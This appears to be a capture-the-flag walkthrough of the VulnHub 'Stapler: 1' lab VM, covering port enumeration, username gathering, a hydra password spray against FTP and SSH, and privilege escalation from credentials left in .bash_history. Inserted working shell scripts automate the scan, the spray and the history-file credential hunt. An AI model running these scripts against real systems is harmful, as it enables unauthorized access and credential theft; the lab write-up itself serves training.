STAPLER: 1 Walkthrough

https://www.vulnhub.com/entry/stapler-1,150/

+ Average beginner/intermediate VM, only a few twists
+ May find it easy/hard (depends on YOUR background)
+ ...also which way you attack the box


“know yourself and you will win all battles”
Sun Tzu


Enumeration

Let’s use NMAP to enumerate.

Brooding:🤔

This machine has many services running. The first thing to do is rule out the services that lead nowhere.
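The full-port scan and port triage described above, as an added example that is not from the original walkthrough: a full TCP port sweep with nmap, a small parser that pulls the open ports out of nmap's grepable (-oG) output, and a version/script scan restricted to those ports. The address 192.168.103.171 is the one in the blog's URLs; the STAPLER_TARGET variable, the function names and the embedded sample grepable line are my own assumptions and constructions, not real scan output from the box.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough.
# Full-port TCP discovery, then a service/script scan restricted to the open ports.
# STAPLER_TARGET, the function names and the sample output below are assumptions.

# Constructed sample of nmap grepable (-oG) output, so the parser can be exercised
# offline. The port list is illustrative, not the walkthrough's real scan result.
sample_grepable() {
    printf 'Host: 192.168.103.171 ()\tPorts: 20/closed/tcp//ftp-data///, 21/open/tcp//ftp///, 22/open/tcp//ssh///, 53/open/tcp//domain///\tIgnored State: filtered (65531)\n'
}

# Read -oG output on stdin; print the open TCP ports as "21,22,53".
# Each entry looks like 21/open/tcp//ftp///; field 2 (split on "/") is the state.
open_ports_from_grepable() {
    grep '^Host:' \
      | sed -n 's/.*Ports: //p' \
      | cut -f1 \
      | tr ',' '\n' \
      | sed 's/^ *//' \
      | awk -F/ '$2 == "open" { print $1 }' \
      | sort -n -u \
      | paste -s -d, -
}

# Phase 1: every TCP port, output written in grepable form for parsing.
full_port_scan() {   # $1 = target, $2 = output file
    command -v nmap >/dev/null 2>&1 || { echo "nmap not installed" >&2; return 1; }
    nmap -p- -T4 --min-rate 1000 -oG "$2" "$1" >/dev/null
}

# Phase 2: version detection plus default NSE scripts on the open ports only
# (service banners, anonymous FTP checks, HTTP titles and the like).
service_scan() {     # $1 = target, $2 = comma-separated port list
    nmap -sV -sC -p "$2" "$1"
}

main() {
    out=$(mktemp)
    full_port_scan "$1" "$out" || return 1
    ports=$(open_ports_from_grepable < "$out")
    echo "open ports on $1: $ports"
    service_scan "$1" "$ports"
}

# Only touch a live host when explicitly asked:
#   STAPLER_TARGET=192.168.103.171 sh scan.sh
if [ -n "${STAPLER_TARGET:-}" ]; then main "$STAPLER_TARGET"; fi
```

Splitting discovery from service detection is what makes a full 65535-port sweep affordable on a lab box: the slow -sV/-sC pass only runs against the handful of ports the fast sweep reported open.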

Ruling out ports

1. Port 666 sent back a zip file containing an image.

📌 username: scott

2. Port 20 — Nothing here.

3. Port 22 — No available exploits.

4. Port 53 — Found nothing on DNS; all the available exploits are DoS.

5. Port 3306 — No remote exploit and no default password.

More Enumeration 🤓…

1. Port 21

📌 username: harry

Found a note on this FTP server.

📌 username: elly

📌 username: john

2. Port 80

  • Manual walk, source code view and robots.txt turned up nothing.
  • Nikto scan: it reported .bashrc and .profile.

Nothing useful in .bashrc or .profile.

🔑 This suggests the web server might be serving a user's home directory. 🤔

  • Gobuster — Nothing here.

3. Port 12380

  • Manual walk + source code view + robots.txt

📌 username: zoe

User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/

  • Nikto scan
  • Gobuster

Found a blog:

https://192.168.103.171:12380/blogblog/

whatweb https://192.168.103.171:12380/blogblog/

Apache[2.4.18], Bootstrap[20120205,4.2.1], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.103.171], JQuery, MetaGenerator[WordPress 4.2.1], PoweredBy[WordPress,WordPress,], Script[text/javascript], Title[Initech | Office Life], UncommonHeaders[dave], WordPress[4.2.1], x-pingback[https://192.168.103.171:12380/blogblog/xmlrpc.php]

Nothing vulnerable found on this WordPress install.

4. Port 139

Found a few shared folders.

  • Got a WordPress backup — kathy
  • Got a todo file — kathy

📌 username: kathy

Got a list of users through the enum4linux script.

Let’s try these users on the services…

  1. ftp
  2. ssh
  3. wordpress

Finding the POI (Point Of Intrusion)

Use the collected usernames to brute-force the services, since we have no other way in for now.

FTP — Hydra turned up a valid login.

No luck on the other services.
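The username collection and brute-force step above, as an added example that is not from the original walkthrough: the names noted during enumeration are merged with whatever enum4linux reported into one list, and hydra sprays that list at FTP and SSH. The hydra flags are real; STAPLER_TARGET, ENUM_FILE, PASSLIST, the function names and the sample enum4linux lines are my own assumptions and constructions. Nothing here states which account actually worked; the page does not say.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough.
# Turn the usernames gathered during enumeration into one list and spray it at
# FTP and SSH with hydra. STAPLER_TARGET, ENUM_FILE, PASSLIST, the function names
# and the sample enum4linux lines are assumptions; the hydra options are real.

# Constructed sample of enum4linux RID-cycling output, for offline use only.
sample_enum4linux() {
    printf 'S-1-22-1-1000 Unix User\\scott (Local User)\n'
    printf 'S-1-22-1-1001 Unix User\\zoe (Local User)\n'
    printf 'S-1-22-2-1000 Unix Group\\sudo (Local Group)\n'
}

# Pull the name out of every "Unix User\name (Local User)" line on stdin.
users_from_enum4linux() {
    sed -n 's/.*Unix User\\\([^ ]*\) (Local User).*/\1/p'
}

# Merge usernames from all sources (given as arguments), drop blanks and duplicates.
# Case is kept as found: Unix usernames are case-sensitive.
build_userlist() {
    for u in "$@"; do printf '%s\n' "$u"; done | sed '/^[[:space:]]*$/d' | sort -u
}

# Spray the list. -e nsr tries, for every account, an empty password, the
# username itself and the username reversed; -P adds a wordlist when given.
# -t 4 keeps the FTP daemon from dropping connections; -f stops at the first hit.
spray() {            # $1 = target, $2 = userlist file, $3 = optional password list
    command -v hydra >/dev/null 2>&1 || { echo "hydra not installed" >&2; return 1; }
    for svc in ftp ssh; do
        if [ -n "${3:-}" ]; then
            hydra -L "$2" -P "$3" -e nsr -t 4 -f "$svc://$1"
        else
            hydra -L "$2" -e nsr -t 4 -f "$svc://$1"
        fi
    done
}

main() {
    target="$1"
    list=$(mktemp)
    extra=""
    # ENUM_FILE: saved output of "enum4linux -r <target>", if you have one
    if [ -r "${ENUM_FILE:-}" ]; then extra=$(users_from_enum4linux < "$ENUM_FILE"); fi
    # names noted during enumeration, plus anything enum4linux reported
    build_userlist scott harry elly john zoe kathy $extra > "$list"
    echo "spraying $(wc -l < "$list" | tr -d ' ') usernames at $target"
    spray "$target" "$list" "${PASSLIST:-}"
}

# e.g.  ENUM_FILE=enum.txt STAPLER_TARGET=192.168.103.171 sh spray.sh
if [ -n "${STAPLER_TARGET:-}" ]; then main "$STAPLER_TARGET"; fi
```

The -e nsr pass is worth running before any wordlist: username-as-password and reversed-username hits are cheap, and hydra's per-service modules (ftp, ssh) let the same list be reused without rewriting the command for each protocol.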


Exploitation

Got in as a low-privilege user.

Privilege Escalation

After looking into the .bash_history file 🤓, got the credentials for two other accounts. One of those accounts has full privileges.

peter has full root privileges.
SSH in as peter.
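The post-foothold step above (credentials left in a shell history, then moving to the privileged account), as an added example that is not from the original walkthrough. It greps every readable history file under a directory for commands that tend to carry a password inline, and then checks what the new account may run as root with sudo -l. The page says peter has root privileges but not how; check_sudo is my assumption about the first thing to verify. The directory layout, pattern list and sample history lines (with fake credential strings) are constructed.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough.
# Post-foothold credential hunting: grep every readable shell history under a
# directory for commands that tend to carry passwords inline, then check sudo.
# The pattern list, directory layout and sample history below are constructed.

# Command shapes that usually mean a password was typed on the command line.
CRED_PATTERN='sshpass|-p[[:alnum:]]|--password|passwd|PASSWORD|mysql .*-u |su [[:alnum:]]|sudo -S'

# $1 = root of the search (default /home). Prints "file:line:command" per hit.
# Unreadable histories are skipped silently; that is the usual case for other users.
find_creds_in_history() {
    root="${1:-/home}"
    find "$root" -type f \( -name '.bash_history' -o -name '.mysql_history' \
         -o -name '.zsh_history' -o -name '.python_history' \) 2>/dev/null |
    while IFS= read -r f; do
        [ -r "$f" ] || continue
        grep -nE "$CRED_PATTERN" "$f" 2>/dev/null | sed "s|^|$f:|"
    done
}

# Once a second account's password is known, run this as that user: sudo -l
# lists what it may run as root. -n fails instead of prompting, so the script
# never hangs; rerun interactively if it says a password is needed.
check_sudo() {
    sudo -n -l 2>/dev/null || echo "sudo -l requires a password; run it interactively"
}

# Constructed demo history (fake credential strings) so the search runs offline.
demo() {
    d=$(mktemp -d)
    mkdir -p "$d/demo"
    printf 'ls -la\nsshpass -p notARealPassword ssh demo@10.0.0.9\nmysql -u root -pnotARealPassword\ncat notes.txt\n' > "$d/demo/.bash_history"
    find_creds_in_history "$d"
    rm -rf "$d"
}

# sh creds.sh demo   -> prints the two planted lines from the constructed history
if [ "${1:-}" = "demo" ]; then demo; fi
```

The same search is worth repeating from each account you land on: a history file that is unreadable from the first foothold is often readable once you are the next user over, which is exactly how a chain of accounts like the one above gets walked.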
